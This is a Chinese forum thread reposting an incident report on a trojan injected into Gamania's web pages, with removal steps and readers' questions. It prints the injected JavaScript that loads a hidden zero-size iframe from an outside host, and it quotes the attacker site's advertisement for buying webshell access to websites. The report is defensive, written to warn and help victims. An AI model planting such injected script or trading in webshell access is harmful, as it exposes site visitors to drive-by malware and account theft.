[color=lime]0924-Gamania木馬一案 ...以及該木馬清除方法[/color]

獵犬

本文來源：巴哈姆特
原文連結：http://forum1.gamer.com.tw/read/05264.php?bsn=05264&snA=48231&locked=F&tnum=21&snAjudge=C
原發表者：WindArea
主要對象：...看下面的時間

-- 事件紀實 --
[9.23 : PM 23:00過後] 天一版驚爆傳出Gamania首頁被植入木馬
[9.24 : PM 01:30過後] 天二版同樣傳出掃到木馬的訊息(F-Secure)
又來一次的阿 ... ... 橘子的資訊安全漏洞頗大
含毒的網頁原始檔為一小段遭變更的JavaScript碼 :
document.write("<iframe width=0 height=0
src=http://www.websafe.com.cn/new/flashfxp.htm></iframe>"
? 不熟悉DHTML的版友應該會有疑惑 , 這行的用途是?
該行JavaScript碼的用途在於悄悄修改網頁Html原始碼
以從中開啟一個 長寬都設定為 0 , 沒有邊框的框架頁
換句話說 , 該行程式碼意圖載入一個網頁 , 但希望讓使用者無法發現
...
...
不用說 , 這時候大家應該發現一樣的地方了
這不正是類似上次官網事件的手法 ... !?
竟然又在Gamania出現阿!?
而且這次的影響範圍將是全Gamania付費系統的遊戲...
備註 : 約凌晨兩點後 , 該木馬檔案所在的websafe.com.cn網站伺服器關閉
　　 而Gash網頁亦總算於清晨修正 ... ... 因此受害範圍不明

-- 該木馬資料 --
以 F-Secure Anti-Virus 掃毒到資料為準 , 該木馬為 TrojanSpy.Win32.Agent.ak
跟上次的官網木馬同屬利用 IE漏洞 , 從 chm檔案中執行exe檔來植入木馬的類型
此木馬會分別於兩個地方植入木馬所需檔案 , 分別為 :
  1. C:\Program Files\rundll32.exe (53KB)
  2. System32\ct1dll.dll (42KB)
  並將更動登錄機碼 , 以於重新開機後木馬將正式載入

  -- 可能受害的危險群 --
  1. 在網咖進行遊戲者 (尤指該網咖Windows未更新者)
  2. 在家進行遊戲 , 但Windows並未開啟自動更新 , 也很久未手動更新者
  這隻木馬所植入的方式是抓過去IE中的一個漏洞 , 但已被修正
  因此有更新Windows的版友(可能)較不需擔心

  -- 中毒徵兆 --
  這次徵兆不明 , 唯一可確定的是在 工作管理員中
  會有個 rundll32.exe (1532K) 在執行.
  若發現該檔案執行 , 且之後有登入天二 , 請依照下列方式移除木馬後 , 重新開機
  並儘速前往官方網站變更密碼

  -- 重新開機後該木馬移除方式 --
  1. 請打開工作管理員 , 強制關閉 rundll32.exe (1532K) 的執行
  2. 請至 System32 底下 , 將exploret.exe , ct1dll.dll 刪除
  3. 請至 C:\Program Files\ 底下 , 將 rundll32.exe 刪除
  4. (此動作較為危險 , 執行前請務必確定你會使用登錄編輯器)
  　請於執行輸入 REGEDIT , 開啟登錄編輯器
  　然後請點擊 [編輯] -[尋找] , 輸入字串 C:\Program Files\rundll32.exe
  　讓登錄編輯器自動搜尋
  　最後請把所有發現有該字串的子機碼值均刪除即可 (約有1-2個)
  　PS: 若有必要 , 請備分你的登錄檔

  -- 重要的備註 --
  *1. 可能的話 , 請大家將身分證字號與新密碼 , 均先另行寫在新txt檔案中
  　 以複製貼上的方式變更密碼 , 這方式較能確保安全
  *2. 若有可能 , 請大家安裝防火牆並更新Windows ... 這才是確保未來安全的唯一之道
  *3. ... .. ......... 橘子在搞什麼?
  *4 摘錄該 websafe.com.cn 網站內容 :
大量收購網站權限公告
本站大量收購臺灣、韓國的網站權限。
收購類型為webshell、要求要有可修改權限webshell
收購價格按照世界排名或者網站日訪問量的流量來擬定價格。
價格規則：
臺灣網站權限：日訪問量為8000IP的價格為800元。在日訪問量8000多1000訪問量在
原800元的價格上加多150元。流量越高，價格越高。
韓國網站權限：新收購項目
日訪問量為8000IP的價格為500元。在日訪問量8000多1000訪問量在原800元的價格
上加多100元。流量越高，價格越高。
希望各路的網絡安全人士、黑客、發揮出你們的能力來。這里是你們的技術發揮的舞臺。
聯系方式：QQ:2005022 (驗證消息：賣權限)
Server@vip.163.com
中國流氓集團 www.websafe.com.cn
站長QQ：2005022

蘇格絲

[QUOTE=獵犬]

-- 可能受害的危險群 --
1. 在網咖進行遊戲者 (尤指該網咖Windows未更新者)
2. 在家進行遊戲 , 但Windows並未開啟自動更新 , 也很久未手動更新者
這隻木馬所植入的方式是抓過去IE中的一個漏洞 , 但已被修正
因此有更新Windows的版友(可能)較不需擔心

[/QUOTE]
更..更新?!更新什麼@@

獵犬

[QUOTE=蘇格絲]更..更新?!更新什麼@@[/QUOte]
看到上面→工具→windows update(更新)

劍狂‧Swordsman

還好我沒中，謝謝分享，大家也小心。

Windows Update

↑請大家常更新 Windows

達米維索

請問一下喔@@我再工作管理員找到一個rundll32.exe 再執行 但是是2708K
這個是有問題的檔嗎?3Q

獵犬

[QUOTE=達米維索]但是是2708K[/QUOTE]
沒問題，這檔案原本就是使用WINDOWS時會執行的程式，
這次有問題的是(1532K)。

烏鴉

謝謝分享囉@@~我按照方法檢查過了還好沒有>M<

雲飛飄雨

我有兩個rundll32.exe 在執行耶 1個3216K  1個1452K 那個有問題嗎煩請告知一下3Q

獵犬

[QUOTE=雲飛飄雨]1個3216K  1個1452K 那個有問題嗎煩請告知一下3Q[/QUOTE]
固定維持在1532的，否則其他都是自己系統的程式在跑。

SILVER WOLF

大量收購網站權限公告
本站大量收購臺灣、韓國的網站權限。
收購類型為webshell、要求要有可修改權限webshell
收購價格按照世界排名或者網站日訪問量的流量來擬定價格。
價格規則：
臺灣網站權限：日訪問量為8000IP的價格為800元。在日訪問量8000多1000訪問量在
原800元的價格上加多150元。流量越高，價格越高。
韓國網站權限：新收購項目
日訪問量為8000IP的價格為500元。在日訪問量8000多1000訪問量在原800元的價格
上加多100元。流量越高，價格越高。
希望各路的網絡安全人士、黑客、發揮出你們的能力來。這里是你們的技術發揮的舞臺。



怪不得有人不爽...不過害了大家，這樣不好吧。